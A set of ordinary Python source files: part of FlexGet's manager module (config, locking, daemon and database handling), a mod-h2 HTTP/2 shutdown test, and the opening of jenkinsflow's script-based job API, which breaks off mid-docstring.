this event will be fired to allow plugins to upgrade their tables
* manager.shutdown_requested
When shutdown has been requested. Any plugins which might add to
execution queue should stop when this is fired.
* manager.shutdown
When the manager is exiting
* manager.execute.completed
If execution in current process was completed
* manager.daemon.started
* manager.daemon.completed
* manager.db_cleanup
"""
unit_test = False
options = None
def __init__(self, args: Optional[Sequence]) -> None:
"""
:param args: CLI args
"""
global manager
if not self.unit_test:
assert not manager, 'Only one instance of Manager should be created at a time!'
elif manager:
logger.info('last manager was not torn down correctly')
if args is None:
# Decode all arguments to unicode before parsing
args = unicode_argv()[1:]
self.args = args
self.autoreload_config = False
self.config_file_hash = None
self.config_base = None
self.config_name = None
self.config_path = None
self.log_filename = None
self.db_filename = None
self.engine = None
self.lockfile = None
self.database_uri = None
self.db_upgraded = False
self._has_lock = False
self.is_daemon = False
self.ipc_server = None
self.task_queue = None
self.persist = None
self.initialized = False
self.config = {}
self.options = self._init_options(args)
try:
self._init_config(create=False)
except:
flexget.log.start(level=self.options.loglevel, to_file=False)
raise
manager = self
logger.debug('sys.defaultencoding: {}', sys.getdefaultencoding())
logger.debug('sys.getfilesystemencoding: {}', sys.getfilesystemencoding())
logger.debug('flexget detected io encoding: {}', io_encoding)
logger.debug('os.path.supports_unicode_filenames: {}', os.path.supports_unicode_filenames)
if (
codecs.lookup(sys.getfilesystemencoding()).name == 'ascii'
and not os.path.supports_unicode_filenames
):
logger.warning(
'Your locale declares ascii as the filesystem encoding. Any plugins reading filenames from '
'disk will not work properly for filenames containing non-ascii characters. Make sure your '
'locale env variables are set up correctly for the environment which is launching FlexGet.'
)
def _add_tray_icon_items(self, tray_icon: 'TrayIcon'):
tray_icon.add_menu_item(text='Shutdown', action=self.shutdown, index=2)
tray_icon.add_menu_item(text='Reload Config', action=self.load_config, index=3)
tray_icon.add_menu_separator(index=4)
@staticmethod
def _init_options(args: Sequence[str]) -> argparse.Namespace:
"""
Initialize argument parsing
"""
try:
options = CoreArgumentParser().parse_known_args(args, do_help=False)[0]
except ParserError as exc:
try:
# If a non-built-in command was used, we need to parse with a parser that
# doesn't define the subparsers
options = manager_parser.parse_known_args(args, do_help=False)[0]
except ParserError as e:
manager_parser.print_help()
print(f'\nError: {exc.message}')
sys.exit(1)
return options
def _init_logging(self, to_file: bool = True) -> None:
"""
Initialize logging facilities
"""
log_file = os.path.expanduser(self.options.logfile)
# If an absolute path is not specified, use the config directory.
if not os.path.isabs(log_file):
log_file = os.path.join(self.config_base, log_file)
self.log_filename = log_file
flexget.log.start(
log_file, self.options.loglevel, to_file=to_file, to_console=not self.options.cron
)
def initialize(self) -> None:
"""
Load plugins, database, and config. Also initializes (but does not start) the task queue and ipc server.
This should only be called after obtaining a lock.
"""
if self.initialized:
raise RuntimeError('Cannot call initialize on an already initialized manager.')
plugin.load_plugins(
extra_plugins=[os.path.join(self.config_base, 'plugins')],
extra_components=[os.path.join(self.config_base, 'components')],
)
# Reparse CLI options now that plugins are loaded
self.options = get_parser().parse_args(self.args)
self.task_queue = TaskQueue()
self.ipc_server = IPCServer(self, self.options.ipc_port)
self.setup_yaml()
self.init_sqlalchemy()
fire_event('manager.initialize', self)
try:
self.load_config()
except ValueError as e:
logger.critical('Failed to load config file: {}', e.args[0])
raise
# cannot be imported at module level because of circular references
from flexget.utils.simple_persistence import SimplePersistence
self.persist = SimplePersistence('manager')
if db_schema.upgrade_required():
logger.info('Database upgrade is required. Attempting now.')
fire_event('manager.upgrade', self)
if manager.db_upgraded:
fire_event('manager.db_upgraded', self)
fire_event('manager.startup', self)
self.initialized = True
@property
def tasks(self) -> List[str]:
"""A list of tasks in the config"""
if not self.config:
return []
return list(self.config.get('tasks', {}).keys())
@property
def has_lock(self) -> bool:
return self._has_lock
def execute(
self,
options: Optional[Union[dict, argparse.Namespace]] = None,
priority: int = 1,
suppress_warnings: Optional[Sequence[str]] = None,
) -> List[Tuple[str, str, threading.Event]]:
"""
Run all (can be limited with options) tasks from the config.
:param options: Either an :class:`argparse.Namespace` instance, or a dict, containing options for execution
:param priority: If there are other executions waiting to be run, they will be run in priority order,
lowest first.
:param suppress_warnings: Allows suppressing log warning about missing plugin in key phases
:returns: a list of :class:`threading.Event` instances which will be
set when each respective task has finished running
"""
if options is None:
options = copy.copy(self.options.execute)
elif isinstance(options, dict):
options_namespace = copy.copy(self.options.execute)
options_namespace.__dict__.update(options)
options = options_namespace
task_names = self.tasks
# Only reload config if daemon
config_hash = self.hash_config()
if self.is_daemon and self.autoreload_config and self.config_file_hash != config_hash:
logger.info('Config change detected. Reloading.')
try:
self.load_config(output_to_console=False, config_file_hash=config_hash)
logger.info('Config successfully reloaded!')
except Exception as e:
logger.error('Reloading config failed: {}', e)
# Handle --tasks
if options.tasks:
# Consider * the same as not specifying tasks at all (makes sure manual plugin still works)
if options.tasks == ['*']:
options.tasks = None
else:
# Create list of tasks to run, preserving order
task_names = []
for arg in options.tasks:
matches = [
t for t in self.tasks if fnmatch.fnmatchcase(str(t).lower(), arg.lower())
]
if not matches:
msg = f'`{arg}` does not match any tasks'
logger.error(msg)
continue
task_names.extend(m for m in matches if m not in task_names)
# Set the option as a list of matching task names so plugins can use it easily
options.tasks = task_names
# TODO: 1.2 This is a hack to make task priorities work still, not sure if it's the best one
task_names = sorted(
task_names, key=lambda t: self.config['tasks'][t].get('priority', 65535)
)
finished_events = []
for task_name in task_names:
task = Task(
self,
task_name,
options=options,
output=get_console_output(),
session_id=flexget.log.get_log_session_id(),
priority=priority,
suppress_warnings=suppress_warnings,
)
self.task_queue.put(task)
finished_events.append((task.id, task.name, task.finished_event))
return finished_events
def start(self) -> None:
"""
Starting point when executing from commandline, dispatch execution to correct destination.
If there is a FlexGet process with an ipc server already running, the command will be sent there for execution
and results will be streamed back.
If not, this will attempt to obtain a lock, initialize the manager, and run the command here.
"""
# When we are in test mode, we use a different lock file and db
if self.options.test:
self.lockfile = os.path.join(self.config_base, '.test-%s-lock' % self.config_name)
# If another process is started, send the execution to the running process
ipc_info = self.check_ipc_info()
# If we are connecting to a running daemon, we don't want to log to the log file,
# the daemon is already handling that.
self._init_logging(to_file=not ipc_info)
if ipc_info:
console(
'There is a FlexGet process already running for this config, sending execution there.'
)
logger.debug('Sending command to running FlexGet process: {}', self.args)
try:
client = IPCClient(ipc_info['port'], ipc_info['password'])
except ValueError as e:
logger.error(e)
else:
try:
client.handle_cli(self.args)
except KeyboardInterrupt:
logger.error(
'Disconnecting from daemon due to ctrl-c. Executions will still continue in the '
'background.'
)
except EOFError:
logger.error('Connection from daemon was severed.')
return
if self.options.test:
logger.info('Test mode, creating a copy from database ...')
db_test_filename = os.path.join(self.config_base, 'test-%s.sqlite' % self.config_name)
if os.path.exists(self.db_filename):
shutil.copy(self.db_filename, db_test_filename)
logger.info('Test database created')
self.db_filename = db_test_filename
# No running process, we start our own to handle command
with self.acquire_lock():
self.initialize()
self.handle_cli()
self._shutdown()
def handle_cli(self, options: Optional[argparse.Namespace] = None) -> None:
"""
Dispatch a cli command to the appropriate function.
* :meth:`.execute_command`
* :meth:`.daemon_command`
* CLI plugin callback function
The manager should have a lock and be initialized before calling this method.
:param options: argparse options for command. Defaults to options that manager was instantiated with.
"""
if not options:
options = self.options
command = options.cli_command
if command is None:
raise Exception('Command missing')
command_options = getattr(options, command)
# First check for built-in commands
if command in ['execute', 'daemon']:
if command == 'execute':
self.execute_command(command_options)
elif command == 'daemon':
self.daemon_command(command_options)
else:
# Otherwise dispatch the command to the callback function
options.cli_command_callback(self, command_options)
def execute_command(self, options: argparse.Namespace) -> None:
"""
Handles the 'execute' CLI command.
If there is already a task queue running in this process, adds the execution to the queue.
If FlexGet is being invoked with this command, starts up a task queue and runs the execution.
Fires events:
* manager.execute.started
* manager.execute.completed
:param options: argparse options
"""
fire_event('manager.execute.started', self, options)
if self.task_queue.is_alive() or self.is_daemon:
if not self.task_queue.is_alive():
logger.error(
'Task queue has died unexpectedly. Restarting it. Please open an issue on Github and include'
' any previous error logs.'
)
self.task_queue = TaskQueue()
self.task_queue.start()
if len(self.task_queue):
logger.verbose('There is a task already running, execution queued.')
finished_events = self.execute(options)
if not options.cron:
# Wait until execution of all tasks has finished
for _, _, event in finished_events:
event.wait()
else:
self.task_queue.start()
self.ipc_server.start()
self.execute(options)
self.shutdown(finish_queue=True)
self.task_queue.wait()
fire_event('manager.execute.completed', self, options)
def daemon_command(self, options: argparse.Namespace) -> None:
"""
Handles the 'daemon' CLI command.
Fires events:
* manager.daemon.started
* manager.daemon.completed
:param options: argparse options
"""
# Import API so it can register to daemon.started event
if options.action == 'start':
if self.is_daemon:
logger.error('Daemon already running for this config.')
return
elif self.task_queue.is_alive():
logger.error(
'Non-daemon execution of FlexGet is running. Cannot start daemon until it is finished.'
)
return
if options.daemonize:
self.daemonize()
if options.autoreload_config:
self.autoreload_config = True
try:
signal.signal(signal.SIGTERM, self._handle_sigterm)
except ValueError as e:
# If flexget is being called from another script, e.g. windows service helper, and we are not the
# main thread, this error will occur.
logger.debug('Error registering sigterm handler: {}', e)
self.is_daemon = True
def run_daemon(tray_icon: Optional['TrayIcon'] = None):
fire_event('manager.daemon.started', self)
self.task_queue.start()
self.ipc_server.start()
self.task_queue.wait()
fire_event('manager.daemon.completed', self)
if tray_icon:
tray_icon.stop()
if options.tray_icon:
from flexget.tray_icon import tray_icon # noqa
self._add_tray_icon_items(tray_icon)
# Tray icon must be run in the main thread.
m = threading.Thread(target=run_daemon, args=(tray_icon,))
m.start()
tray_icon.run()
m.join()
else:
run_daemon()
elif options.action in ['stop', 'reload-config', 'status']:
if not self.is_daemon:
logger.error('There does not appear to be a daemon running.')
return
if options.action == 'status':
logger.info('Daemon running. (PID: {})', os.getpid())
elif options.action == 'stop':
tasks = (
'all queued tasks (if any) have'
if options.wait
else 'currently running task (if any) has'
)
logger.info(
'Daemon shutdown requested. Shutdown will commence when {} finished executing.',
tasks,
)
self.shutdown(options.wait)
elif options.action == 'reload-config':
logger.info('Reloading config from disk.')
try:
self.load_config()
except ValueError as e:
logger.error('Error loading config: {}', e.args[0])
else:
logger.info('Config successfully reloaded from disk.')
def _handle_sigterm(self, signum, frame) -> None:
logger.info('Got SIGTERM. Shutting down.')
self.shutdown(finish_queue=False)
def setup_yaml(self) -> None:
"""Sets up the yaml loader to return unicode objects for strings by default"""
def construct_yaml_str(self, node):
# Override the default string handling function
# to always return unicode objects
return self.construct_scalar(node)
yaml.Loader.add_constructor(u'tag:yaml.org,2002:str', construct_yaml_str)
yaml.SafeLoader.add_constructor(u'tag:yaml.org,2002:str', construct_yaml_str)
# Set up the dumper to not tag every string with !!python/unicode
def unicode_representer(dumper, uni):
node = yaml.ScalarNode(tag=u'tag:yaml.org,2002:str', value=uni)
return node
yaml.add_representer(str, unicode_representer)
# Set up the dumper to increase the indent for lists
def increase_indent_wrapper(func):
def increase_indent(self, flow=False, indentless=False):
func(self, flow, False)
return increase_indent
yaml.Dumper.increase_indent = increase_indent_wrapper(yaml.Dumper.increase_indent)
yaml.SafeDumper.increase_indent = increase_indent_wrapper(yaml.SafeDumper.increase_indent)
def _init_config(self, create: bool = False) -> None:
"""
Find and load the configuration file.
:param bool create: If a config file is not found, and create is True, one will be created in the home folder
:raises: `IOError` when no config file could be found, and `create` is False.
"""
home_path = os.path.join(os.path.expanduser('~'), '.flexget')
options_config = os.path.expanduser(self.options.config)
possible = []
if os.path.isabs(options_config):
# explicit path given, don't try anything
config = options_config
possible = [config]
else:
logger.debug('Figuring out config load paths')
try:
possible.append(os.getcwd())
except OSError:
logger.debug('current directory invalid, not searching for config there')
# for virtualenv / dev sandbox
if hasattr(sys, 'real_prefix'):
logger.debug('Adding virtualenv path')
possible.append(sys.prefix)
# normal lookup locations
possible.append(home_path)
if sys.platform.startswith('win'):
# On windows look in ~/flexget as well, as explorer does not let you create a folder starting with a dot
home_path = os.path.join(os.path.expanduser('~'), 'flexget')
possible.append(home_path)
else:
# The freedesktop.org standard config location
xdg_config = os.environ.get(
'XDG_CONFIG_HOME', os.path.join(os.path.expanduser('~'), '.config')
)
possible.append(os.path.join(xdg_config, 'flexget'))
for path in possible:
config = os.path.join(path, options_config)
if os.path.exists(config):
logger.debug('Found config: {}', config)
break
else:
config = None
if create and not (config and os.path.exists(config)):
config = os.path.join(home_path, options_config)
logger.info('Config file {} not found. Creating new config {}', options_config, config)
with open(config, 'w') as newconfig:
# Write empty tasks to the config
newconfig.write(yaml.dump({'tasks': {}}))
elif not config:
logger.critical('Failed to find configuration file {}', options_config)
logger.info('Tried to read from: {}', ', '.join(possible))
raise IOError('No configuration file found.')
if not os.path.isfile(config):
raise IOError('Config `%s` does not appear to be a file.' % config)
logger.debug('Config file {} selected', config)
self.config_path = config
self.config_name = os.path.splitext(os.path.basename(config))[0]
self.config_base = os.path.normpath(os.path.dirname(config))
self.lockfile = os.path.join(self.config_base, '.%s-lock' % self.config_name)
self.db_filename = os.path.join(self.config_base, 'db-%s.sqlite' % self.config_name)
def hash_config(self) -> Optional[str]:
if not self.config_path:
return
sha1_hash = hashlib.sha1()
with io.open(self.config_path, 'rb') as f:
while True:
data = f.read(65536)
if not data:
break
sha1_hash.update(data)
return sha1_hash.hexdigest()
def load_config(
self, output_to_console: bool = True, config_file_hash: Optional[str] = None
) -> None:
"""
Loads the config file from disk, validates and activates it.
:raises: `ValueError` if there is a problem loading the config file
"""
fire_event('manager.before_config_load', self)
with io.open(self.config_path, 'r', encoding='utf-8') as f:
try:
raw_config = f.read()
except UnicodeDecodeError:
logger.critical('Config file must be UTF-8 encoded.')
raise ValueError('Config file is not UTF-8 encoded')
try:
self.config_file_hash = config_file_hash or self.hash_config()
config = yaml.safe_load(raw_config) or {}
except Exception as e:
msg = str(e).replace('\n', ' ')
msg = ' '.join(msg.split())
logger.critical(msg)
if output_to_console:
print('')
print('-' * 79)
print(' Malformed configuration file (check messages above). Common reasons:')
print('-' * 79)
print('')
print(' o Indentation error')
print(' o Missing : from end of the line')
print(' o Non ASCII characters (use UTF8)')
print(
' o If text contains any of :[]{}% characters it must be single-quoted '
'(eg. value{1} should be \'value{1}\')\n'
)
# Not very good practice but we get several kind of exceptions here, I'm not even sure all of them
# At least: ReaderError, YmlScannerError (or something like that)
if (
hasattr(e, 'problem')
and hasattr(e, 'context_mark')
and hasattr(e, 'problem_mark')
):
lines = 0
if e.problem is not None:
print(' Reason: %s\n' % e.problem)
if e.problem == 'mapping values are not allowed here':
print(' ----> MOST LIKELY REASON: Missing : from end of the line!')
print('')
if e.context_mark is not None:
print(
' Check configuration near line %s, column %s'
% (e.context_mark.line, e.context_mark.column)
)
lines += 1
if e.problem_mark is not None:
print(
' Check configuration near line %s, column %s'
% (e.problem_mark.line, e.problem_mark.column)
)
lines += 1
if lines:
print('')
if lines == 1:
print(' Fault is almost always in this or previous line\n')
if lines == 2:
print(' Fault is almost always in one of these lines or previous ones\n')
# When --debug escalate to full stacktrace
if self.options.debug or not output_to_console:
raise
raise ValueError('Config file is not valid YAML')
# config loaded successfully
logger.debug('config_name: {}', self.config_name)
logger.debug('config_base: {}', self.config_base)
# Install the newly loaded config
self.update_config(config)
def update_config(self, config: dict) -> None:
"""
Provide a new config for the manager to use.
:raises: `ValueError` and rolls back to previous config if the provided config is not valid.
"""
new_user_config = config
old_config = self.config
try:
self.config = self.validate_config(config)
except ValueError as e:
for error in getattr(e, 'errors', []):
logger.critical('[{}] {}', error.json_pointer, error.message)
logger.debug('invalid config, rolling back')
self.config = old_config
raise
logger.debug('New config data loaded.')
self.user_config = copy.deepcopy(new_user_config)
fire_event('manager.config_updated', self)
def backup_config(self) -> str:
backup_path = os.path.join(
self.config_base,
'%s-%s.bak' % (self.config_name, datetime.now().strftime('%y%m%d%H%M%S')),
)
logger.debug('backing up old config to {} before new save', backup_path)
try:
shutil.copy(self.config_path, backup_path)
except (OSError, IOError) as e:
logger.warning('Config backup creation failed: {}', str(e))
raise
return backup_path
def save_config(self) -> None:
"""Dumps current config to yaml config file"""
# TODO: Only keep x number of backups..
# Back up the user's current config before overwriting
try:
self.backup_config()
except (OSError, IOError):
return
with open(self.config_path, 'w') as config_file:
config_file.write(yaml.dump(self.user_config, default_flow_style=False))
def config_changed(self) -> None:
"""Makes sure that all tasks will have the config_modified flag come out true on the next run.
Useful when changing the db and all tasks need to be completely reprocessed."""
from flexget.task import config_changed
config_changed()
fire_event('manager.config_updated', self)
def validate_config(self, config: Optional[dict] = None) -> dict:
"""
Check all root level keywords are valid. Config may be modified by before_config_validate hooks. Modified
config will be returned.
:param config: Config to check. If not provided, current manager config will be checked.
:raises: `ValueError` when config fails validation. There will be an `errors` attribute with the schema errors.
:returns: Final validated config.
"""
if not config:
config = self.config
config = fire_event('manager.before_config_validate', config, self)
errors = config_schema.process_config(config)
if errors:
err = ValueError('Did not pass schema validation.')
err.errors = errors
raise err
else:
return config
def init_sqlalchemy(self) -> None:
"""Initialize SQLAlchemy"""
try:
if [int(part) for part in sqlalchemy.__version__.split('.')] < [0, 7, 0]:
print(
'FATAL: SQLAlchemy 0.7.0 or newer required. Please upgrade your SQLAlchemy.',
file=sys.stderr,
)
sys.exit(1)
except ValueError as e:
logger.critical('Failed to check SQLAlchemy version, you may need to upgrade it')
# SQLAlchemy
if self.database_uri is None:
# in case running on windows, needs double \\
filename = self.db_filename.replace('\\', '\\\\')
self.database_uri = 'sqlite:///%s' % filename
if self.db_filename and not os.path.exists(self.db_filename):
logger.verbose('Creating new database {} - DO NOT INTERRUPT ...', self.db_filename)
# fire up the engine
logger.debug('Connecting to: {}', self.database_uri)
try:
self.engine = sqlalchemy.create_engine(
self.database_uri,
echo=self.options.debug_sql,
connect_args={'check_same_thread': False, 'timeout': 10},
)
except ImportError as e:
print(
'FATAL: Unable to use SQLite. Are you running Python 2.7, 3.3 or newer ?\n'
'Python should normally have SQLite support built in.\n'
'If you\'re running correct version of Python then it is not equipped with SQLite.\n'
'You can try installing `pysqlite`. If you have compiled python yourself, '
'recompile it with SQLite support.\n'
'Error: %s' % e,
file=sys.stderr,
)
sys.exit(1)
Session.configure(bind=self.engine)
# create all tables, doesn't do anything to existing tables
try:
Base.metadata.create_all(bind=self.engine)
except OperationalError as e:
if os.path.exists(self.db_filename):
print(
'%s - make sure you have write permissions to file %s'
% (e.message, self.db_filename),
file=sys.stderr,
)
else:
print(
'%s - make sure you have write permissions to directory %s'
% (e.message, self.config_base),
file=sys.stderr,
)
raise
def _read_lock(self) -> Optional[dict]:
"""
Read the values from the lock file. Returns None if there is no current lock file.
"""
if self.lockfile and os.path.exists(self.lockfile):
result = {}
with io.open(self.lockfile, encoding='utf-8') as f:
lines = [l for l in f.readlines() if l]
for line in lines:
try:
key, value = line.split(':', 1)
except ValueError:
logger.debug('Invalid line in lock file: {}', line)
continue
result[key.strip().lower()] = value.strip()
for key in result:
if result[key].isdigit():
result[key] = int(result[key])
result.setdefault('pid', None)
if not result['pid']:
logger.error(
'Invalid lock file. Make sure FlexGet is not running, then delete it.'
)
elif not pid_exists(result['pid']):
return None
return result
return None
def check_lock(self) -> bool:
"""Returns True if there is a lock on the database."""
lock_info = self._read_lock()
if not lock_info:
return False
# Don't count it if we hold the lock
if os.getpid() == lock_info['pid']:
return False
return True
def check_ipc_info(self) -> Optional[dict]:
"""If a daemon has a lock on the database, return info to connect to IPC."""
lock_info = self._read_lock()
if lock_info and 'port' in lock_info:
return lock_info
return None
@contextmanager
def acquire_lock(self, event: bool = True) -> Iterator:
"""
:param bool event: If True, the 'manager.lock_acquired' event will be fired after a lock is obtained
"""
acquired = False
try:
# Don't do anything if we already have a lock. This means only the outermost call will release the lock file
if not self._has_lock:
# Exit if there is an existing lock.
if self.check_lock():
with io.open(self.lockfile, encoding='utf-8') as f:
pid = f.read()
print(
'Another process (%s) is running, will exit.' % pid.split('\n')[0],
file=sys.stderr,
)
print(
'If you\'re sure there is no other instance running, delete %s'
% self.lockfile,
file=sys.stderr,
)
sys.exit(1)
self._has_lock = True
self.write_lock()
acquired = True
if event:
fire_event('manager.lock_acquired', self)
yield
finally:
if acquired:
self.release_lock()
self._has_lock = False
def write_lock(self, ipc_info: Optional[dict] = None) -> None:
assert self._has_lock
with io.open(self.lockfile, 'w', encoding='utf-8') as f:
f.write('PID: %s\n' % os.getpid())
if ipc_info:
for key in sorted(ipc_info):
f.write('%s: %s\n' % (key, ipc_info[key]))
def release_lock(self) -> None:
try:
os.remove(self.lockfile)
except OSError as e:
if e.errno != errno.ENOENT:
raise
logger.debug('Lockfile {} not found', self.lockfile)
else:
logger.debug('Removed {}', self.lockfile)
def daemonize(self) -> None:
"""Daemonizes the current process. Returns the new pid"""
if sys.platform.startswith('win'):
logger.error('Cannot daemonize on windows')
return
if threading.activeCount() != 1:
logger.critical(
'There are {!r} active threads. Daemonizing now may cause strange failures.',
threading.enumerate(),
)
logger.info('Daemonizing...')
try:
pid = os.fork()
if pid > 0:
# Don't run the exit handlers on the parent
atexit._exithandlers = []
# exit first parent
sys.exit(0)
except OSError as e:
sys.stderr.write('fork #1 failed: %d (%s)\n' % (e.errno, e.strerror))
sys.exit(1)
# decouple from parent environment
os.chdir('/')
os.setsid()
os.umask(0)
# do second fork
try:
pid = os.fork()
if pid > 0:
# Don't run the exit handlers on the parent
atexit._exithandlers = []
# exit from second parent
sys.exit(0)
except OSError as e:
sys.stderr.write('fork #2 failed: %d (%s)\n' % (e.errno, e.strerror))
sys.exit(1)
logger.info('Daemonize complete. New PID: {}', os.getpid())
# redirect standard file descriptors
sys.stdout.flush()
sys.stderr.flush()
si = open(os.devnull, 'r')
so = open(os.devnull, 'ab+')
se = open(os.devnull, 'ab+', 0)
os.dup2(si.fileno(), sys.stdin.fileno())
os.dup2(so.fileno(), sys.stdout.fileno())
os.dup2(se.fileno(), sys.stderr.fileno())
# If we have a lock, update the lock file with our new pid
if self._has_lock:
self.write_lock()
def db_cleanup(self, force: bool = False) -> None:
"""
Perform database cleanup if cleanup interval has been met.
Fires events:
* manager.db_cleanup
If interval was met. Gives session to do the cleanup as a parameter.
:param bool force: Run the cleanup no matter whether the interval has been met.
"""
expired = (
self.persist.get('last_cleanup', datetime(1900, 1, 1))
< datetime.now() - DB_CLEANUP_INTERVAL
)
if force or expired:
logger.info('Running database cleanup.')
with Session() as session:
fire_event('manager.db_cleanup', self, session)
# Try to VACUUM after cleanup
fire_event('manager.db_vacuum', self)
# Just in case some plugin was overzealous in its cleaning, mark the config changed
self.config_changed()
self.persist['last_cleanup'] = datetime.now()
else:
logger.debug('Not running db cleanup, last run {}', self.persist.get('last_cleanup'))
def shutdown(self, finish_queue: bool = True) -> None:
"""
Request manager shutdown.
:param bool finish_queue: Should scheduler finish the task queue
"""
if not self.initialized:
raise RuntimeError('Cannot shutdown manager that was never initialized.')
fire_event('manager.shutdown_requested', self)
self.task_queue.shutdown(finish_queue)
def _shutdown(self) -> None:
"""Runs when the manager is done processing everything."""
if self.ipc_server:
self.ipc_server.shutdown()
fire_event('manager.shutdown', self)
if not self.unit_test: # don't scroll "nosetests" summary results when logging is enabled
logger.debug('Shutting down')
self.engine.dispose()
# remove temporary database used in test mode
if self.options.test:
if 'test' not in self.db_filename:
raise Exception('trying to delete non test database?')
if self._has_lock:
os.remove(self.db_filename)
logger.info('Removed test database')
global manager
manager = None
def crash_report(self) -> str:
"""
This should be called when handling an unexpected exception. Will create a new log file containing the last 50
debug messages as well as the crash traceback.
"""
if not self.unit_test:
log_dir = os.path.dirname(self.log_filename)
filename = os.path.join(
log_dir, datetime.now().strftime('crash_report.%Y.%m.%d.%H%M%S%f.log')
)
with codecs.open(filename, 'w', encoding='utf-8') as outfile:
outfile.writelines(flexget.log.debug_buffer)
traceback.print_exc(file=outfile)
logger.critical(
'An unexpected crash has occurred. Writing crash report to {}. '
'Please verify you are running the latest version of flexget by using "flexget -V" '
'from CLI or by using version_checker plugin'
' at http://flexget.com/wiki/Plugins/version_checker. '
'You are currently using version {}',
filename,
get_current_flexget_version(),
)
logger.opt(exception=True).debug('Traceback:')
return traceback.format_exc()
|
test_106_shutdown.py
|
#
# mod-h2 test suite
# check HTTP/2 timeout behaviour
#
import time
from threading import Thread
import pytest
from .env import H2Conf
from pyhttpd.result import ExecResult
class TestShutdown:
@pytest.fixture(autouse=True, scope='class')
def _class_scope(self, env):
conf = H2Conf(env)
conf.add_vhost_cgi()
conf.install()
assert env.apache_restart() == 0
def test_h2_106_01(self, env):
url = env.mkurl("https", "cgi", "/necho.py")
lines = 100000
text = "123456789"
wait2 = 1.0
self.r = None
def long_request():
args = ["-vvv",
"-F", f"count={lines}",
"-F", f"text={text}",
"-F", f"wait2={wait2}",
]
self.r = env.curl_get(url, 5, options=args)
t = Thread(target=long_request)
t.start()
time.sleep(0.5)
assert env.apache_reload() == 0
t.join()
# noinspection PyTypeChecker
r: ExecResult = self.r
assert r.response["status"] == 200
assert len(r.response["body"]) == (lines * (len(text)+1))
|
script_api.py
|
# Copyright (c) 2012 - 2015 Lars Hupfeldt Nielsen, Hupfeldt IT
# All rights reserved. This work is under a BSD license, see LICENSE.TXT.
import sys, os, shutil, importlib, datetime, tempfile, psutil, setproctitle, signal, errno
from os.path import join as jp
import multiprocessing
import urllib.parse
from .api_base import BuildResult, Progress, UnknownJobException, BaseApiMixin, ApiInvocationMixin
from .speed import Speed
here = os.path.abspath(os.path.dirname(__file__))
def _mkdir(path):
try:
os.mkdir(path)
except OSError as ex:
if ex.errno != errno.EEXIST:
raise
def _pgrep(proc_name):
"""Returns True if a process with name 'proc_name' is running, else False"""
try:
for proc in psutil.process_iter():
if proc_name == proc.name():
return True
except psutil.NoSuchProcess:
return False
return False
class LoggingProcess(multiprocessing.Process):
proc_name_prefix = "jenkinsflow_script_api_"
def __init__(self, group=None, target=None, output_file_name=None, workspace=None, name=None, args=(), env=None):
self.user_target = target
super().__init__(group=group, target=self.run_job_wrapper, name=name, args=args)
self.output_file_name = output_file_name
self.workspace = workspace
self.env = env
self._build_res_unstable = False
def run_job_wrapper(self, *args):
setproctitle.setproctitle(self.proc_name_prefix + self.name)
# Set signalhandler for changing job result
def set_result(_sig, _frame):
print("\nGot SIGUSR1: Changing result to 'unstable'")
self._build_res_unstable = True
signal.signal(signal.SIGUSR1, set_result)
os.chdir(self.workspace)
os.environ.update(self.env)
os.environ['EXECUTOR_NUMBER'] = repr(self.pid)
try:
rc = self.user_target(*args)
except Exception as ex: # pylint: disable=broad-except
print("jenkinsflow.script_api: Caught exception from job script:", ex)
rc = 1
if self._build_res_unstable:
sys.exit(2)
sys.exit(rc)
def run(self):
sys.stdout = sys.stderr = open(self.output_file_name, 'w', buffering=1)
super().run()
class Jenkins(Speed, BaseApiMixin):
"""Optimized minimal set of methods needed for jenkinsflow to directly execute python code instead of invoking Jenkins jobs.
THIS DOES NOT SUPPORT CONCURRENT INVOCATIONS OF FLOW
There is no concept of job queues or executors, so if your flow depends on these for correctness, you wil experience different behaviour
when using this api instead of the real Jenkins.
Args:
direct_uri (str): Path to dir with 'job' method python modules. Modules named <job-name>.py will be imported from this directory.
If no module exists for a specific jobname, the module called 'default.py' will be imported.
The modules must contain at method called 'run_job' with the following signature:
run_job(job_name, job_prefix_filter, username, password, securitytoken, cause, build_params)
A return value of 0 is 'SUCCESS'
A return value of 1 or any exception raised is 'FAILURE'
Other return values means 'UNSTABLE'
job_prefix_filter (str): Passed to 'run_job'. ``jenkinsflow`` puts no meaning into this parameter.
username (str): Passed to 'run_job'. ``jenkinsflow`` puts no meaning into this parameter.
password (str): Passed to 'run_job'. ``jenkinsflow`` puts no meaning into this parameter.
invocation_class (class): Defaults to `Invocation`.
log_dir (str): Directory in which to store logs. Defaults to subdirectory 'jenkinsflow' under the system defined tmp dir.
**kwargs: Ignored for compatibility with the other jenkins apis
"""
def __init__(self, direct_uri, job_prefix_filter=None, username=None, password=None, invocation_class=None, log_dir=None, **kwargs):
self.job_prefix_filter = job_prefix_filter
self.username = username
self.password = password
self.public_uri = direct_uri
self.log_dir = log_dir or os.path.join(tempfile.gettempdir(), 'jenkinsflow')
self.invocation_class = invocation_class or Invocation
self.jenkins_prefix = urllib.parse.urlsplit(direct_uri).path # If direct_uri is a path, then jenkins_prefix will be the same as direct_uri
self.jobs = {}
def poll(self):
pass
def quick_poll(self):
pass
def queue_poll(self):
pass
def _script_file(self, job_name):
return jp(self.public_uri, job_name + '.py')
def _workspace(self, job_name):
return jp(self.public_uri, job_name.replace('/', '_'))
def get_job(self, name):
job = self.jobs.get(name)
if not job:
script_file = script_file1 = self._script_file(name)
if not os.path.exists(script_file):
script_file = self._script_file('default')
if not os.path.exists(script_file):
raise UnknownJobException(script_file1 + ' or ' + script_file)
script_dir = os.path.dirname(script_file)
if script_dir not in sys.path:
sys.path.append(script_dir)
try:
user_module = importlib.import_module(os.path.basename(script_file).replace('.py', ''), package=None)
except (ImportError, SyntaxError) as ex:
raise UnknownJobException(repr(script_file) + ' ' + repr(ex)) from ex
try:
func = user_module.run_job
except AttributeError as ex:
raise UnknownJobException(script_file + repr(ex)) from ex
job = self.jobs[name] = ApiJob(jenkins=self, name=name, script_file=script_file, workspace=self._workspace(name), func=func)
return job
def create_job(self, job_name, config_xml):
script_file = self._script_file(job_name)
_mkdir(os.path.dirname(script_file))
with open(script_file, 'w') as ff:
ff.write(config_xml)
def delete_job(self, job_name):
script_file = self._script_file(job_name)
try:
os.unlink(script_file)
except OSError as ex:
if not os.path.exists(script_file):
raise UnknownJobException(script_file + repr(ex)) from ex
raise
try:
shutil.rmtree(self._workspace(job_name))
except OSError as ex:
if os.path.exists(script_file):
raise
def set_build_description(
self, description: str, replace: bool = False, separator: str = '\n',
build_url: str = None, job_name: str = None, build_number: int = None):
"""Utility to set/append build description. :py:obj:`description` will be written to a file in the workspace.
Args:
